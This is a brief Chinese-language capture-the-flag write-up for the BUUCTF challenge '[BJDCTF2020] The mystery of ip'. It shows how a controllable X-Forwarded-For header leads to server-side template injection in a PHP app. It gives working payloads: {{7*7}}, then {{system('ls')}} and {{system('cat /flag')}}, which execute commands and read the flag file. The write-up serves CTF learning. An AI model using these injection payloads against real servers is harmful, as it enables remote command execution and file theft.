BUUCTF[BJDCTF2020]The mystery of ip 1

考点：

　　1.X-Forwarded-For注入

　　2.PHP可能存在Twig模版注入漏洞，Flask可能存在Jinjia2模版注入漏洞

启动环境：

一共有三个界面，BGTCTF，flag，hint.

 

 flag处有IP值，结合题目“ip的秘密”，可能存在X-Forwarded-For注入，对flag界面进行抓包。

 添加请求头X-Forwarded-For    1

 被成功执行，XFF可控，代码是php代码，推测：

　　PHP可能存在Twig模版注入漏洞

　　Smarty模板的SSTI漏洞（主要为Flask存在Jinjia2模版注入漏洞）

添加模板算式，{{7*7}}

成功执行。尝试是否能执行命令：

X-Forwarded-For：{{system('ls')}}

查看flag的位置

 在 / 目录下找到flag，

X-Forwarded-For：{{system('cat /flag')}}

 得到flag。